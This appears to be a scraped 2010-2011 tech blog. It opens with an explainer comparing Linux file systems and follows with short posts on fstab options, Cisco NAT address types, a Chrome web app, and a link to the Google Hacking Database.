Ext stands for Extended file system and was the first created specifically for Linux. It has had four revisions and each one has added fairly significant features. The first version of Ext was a major upgrade from the Minix file system used at the time, but it lacks major features used in today’s computing.

At this time you probably should not use Ext in any machine due to its limitation and age. It also is no longer supported in many distributions.

Ext2 is not a journaling file system, and when introduced was the first to allow for extended file attributes and 2 terabyte drives. Because Ext2 does not use a journal it has significantly less writes applied to the disk.

Due to lower write requirements, and hence lower erases, it is ideal for flash memory especially on USB flash drives.
Modern SSDs have a increased life span and additional features that can negate the need for using a non-journaling file systems.

Ext3 is basically just Ext2 with journaling. The aim of Ext3 was to be backwards compatible with Ext2 and therefore disks can be converted between the two without needing to format the drive. The problem with keeping compatibility is many of the limitations of Ext2 still exist in Ext3. The benefit of keeping backwards compatibility is the fact that most of the testing, bug fixes, and use cases for Ext2 also apply to Ext3 making it stable and fast.

Use if you need to upgrade a previous Ext2 file system to have journaling.
You will probably get the best database performance from Ext3 due to years of optimizations.
Not the best choice for file servers because it lacks disk snapshots and file recovery is very difficult if deleted.

Ext4, just like Ext3 before it, keeps backwards compatibility with its predecessors. As a matter of fact, you can mount Ext2 and Ext3 as an Ext4 file system in Linux and that alone can increase performance under certain conditions. You can also mount an Ext4 file system as Ext3 without ill effects.

Ext4 reduces file fragmentation, allows for larger volumes and files, and employs delayed allocation which helps with flash memory life as well as fragmentation. Although it is used in other file systems, delayed allocation has potential for data loss and has come under some scrutiny.

A better choice for SSDs than Ext3 and improves on general performance over both previous Ext versions. If this is your distro’s default supported file system, you should probably stick with it for any desktop or laptop you set up.
It also shows promising performance numbers for database servers, but hasn’t been around as long as Ext3.

BtrFS, pronounced “Butter” or “Better” FS, is being developed by Oracle and contains similar features found in ReiserFS. It stants for B-Tree File System and allows for drive pooling, on the fly snapshots, transparent compression, and online defragmentation. It is being specifically designed for enterprises but most every consumer distro has plans to move to it as the default file system eventually.

Although it’s not stable in some distros, it will eventually be the default replacement for Ext4 and currently offers on-the-fly conversion from Ext3/4. It is also key to note that the principle developer for ext3/4, Theodore Ts’o, has said that BtrFS is the “way forward”.

BtrFS makes a great server file system due to it’s performance, snapshots, and many other features.
Oracle is also working on a replacement for NFS and CIFS called CRFS which boasts better performance and more features. Making it the best choice for a file server.
The performance tests have shown it to lag behind Ext4 on flash memory such as SSDs, as a database server, and even certain cases of general system read/writes.
Ubuntu 10.10 only allows you to install BtrFS if you use the text base alternate install CD and your /boot partition still requires an Ext file system.

ReiserFS was a big leap forward for Linux file systems when it was introduced in 2001 and it included many new features that Ext would never be able to implement. ReiserFS was replaced by Reiser4 in 2004 which improved on many of the features that were incomplete or lacking in the initial release. However Reiser4 development is very slow and it still does not have support in the main Linux kernel. ReiserFS is the only version currently available in many distributions.

Has great performance for small files such as logs and is suited for databases and email servers.
ReiserFS can be dynamically expanded but not shrunk and does not support FS level encryption.
The future of Reiser4 is questionable and BtrFS is probably a better choice.

XFS was developed by Silicon Graphics in 1994 for their own operating system and was later ported to Linux in 2001. It is comparable to Ext4 is some regards because it also uses delayed allocation to help with file fragmentation and does not allow for mounted snapshots. XFS has shown itself to provide good performance with large files and has the ability to be resized, however you are not able to shrink an XFS volume.

Good for a media file server because of constant throughput for large files.
Most distributions require separate /boot partition because XFS and GRUB can be unpredictable
Performance with small files is not as good as other file systems making it a poor choice for databases, email, and other servers that have a lot of logs.
Not as well supported as Ext for personal computers and doesn’t have significant performance improvements or features over Ext3/4.

JFS was developed by IBM in 1990 and later ported to Linux. It boasts low CPU usage and good performance for both large and small files. JFS partitions can be dynamically resized but not shrunk like ReiserFS and XFS. It was extremely well planned and has support in most every major distribution, however its production testing on Linux servers isn’t as extensive as Ext as it was designed for AIX.

Good performance for both large and small files and because of its low CPU usage is probably best for low powered servers and computers
It does not have built in tools for drive pooling so it may not be as expandable as something like BtrFS but a netbook with only 1 hard drive may be a good option
It also has fast disk checking compared to Ext but there have been some reports of disk corruption after long term use.

ZFS is worth a mention because it is also be being developed by Oracle and has similar features to Btrfs and ReiserFS. It was in the news in recent years when Apple was rumored to move to it as their default file system. Due to its licensing, Sun CDDL, it is not compatible to be included in the Linux kernel. It does however have support through Linux’s Filesystem in Userspace (FUSE) which makes using ZFS possible.

Shows great performance in large disk arrays.
Supports a lot of advanced features including drive pooling, snapshots, and dynamic disk striping.
It may be difficult to install in Linux because it requires FUSE and might not be supported by your distribution.

Swap isn’t actually a file system. It is used as virtual memory and doesn’t have a file system structure. It cannot be mounted and read but is only used by the kernel to write memory pages to disk. It is typically only used when you either run out of physical memory or when you put your computer in hibernate but it is important to know what your partitioning tools mean when it asks for a swap space.

To learn even more you can check out the Wikipedia page on comparison of file systems.

So Which One Should You Choose?

For a general use case on your laptop or desktop, you’ll probably want to stick with ext4 (if your distro uses it as the default), since it’s a modern file system that’s supported in most distributions—but if you’ve got a specific need, now you have more information to make your decision.

So now that you understand the differences between the file systems, which one would you choose?

HTG Explains What is the Linux fstab

2011-01-02T16:26:00.000+08:00

A lot of people don't know that Linux /etc/fstab stands for 'file system table'. And not many people are comfortable to modify the configuration of it.

Do you know why it starts with UUID?
Do you know you can mount NTFS partition with ntfs-3g driver?
How about the options? auto/noauto? exec/noexec? ro/rw? sync/async? user/nouser?
Do you know that "user" option automatically implies "exec"?
What are dumping and pass?

Some of the minor settings are really new to me. For example, "sync" forces writing to occur immediately on execution of the command, which ideal for floppies and USB drives, but isn't entirely necessary for internal hard disk. What "async" does is allow the command to execute over an elapsed time period, perhaps when user activity dies down and the like. This is usually why you ever get a message asking you to "wait while changes are being written to the drive".

Go read the article to refresh some memory at http://www.howtogeek.com/howto/38125/htg-explains-what-is-the-linux-fstab-and-how-does-it-work/

Cisco NAT Address Types

2010-12-30T16:29:00.002+08:00

Cisco IOS NAT address types can be very confusing. I just read a very good article describing the different types of NAT address. Here's the summary:

Inside global: The address of the inside host as seen from the outside
Inside local: The address of the inside host as seen from the inside
Outside local: The address of the outside host as seen from the inside
Outside global: The address of the outside host as seen from the outside

To read the full article, goto Understanding NAT address types.

MySEQ Web App

2010-12-30T14:42:00.001+08:00

Nothing fancy, but it is my first (hello world) web app for Google Chrome. I'm following the instruction at http://code.google.com/chrome/apps/docs/developers_guide.html

Screenshot of Chrome New Tab

Note: it is the same process how I created for Google Reader Web App at http://myseq.blogspot.com/2010/08/creating-google-reader-web-apps-with.html

Google Reader Unreachable

2010-12-29T10:21:00.000+08:00

The app is currently unreachable.

Google Hacking Database, GHDB, Google Dorks

2010-12-28T16:40:00.000+08:00

Remember Johnny Long's Google Hacking Database (GHDB)?

At exploit-DB, it is called 'googledorks': inept or foolish people as revealed by Google. Here are the 2 sites that host the Google Dorks:

Google Hacking Universe (Exploit-DB) - organized into categories and searchable.
Google Dorks (by PenTestIT)

Something Went Wrong with Facebook

2010-12-28T10:03:00.000+08:00

Sorry, something went wrong.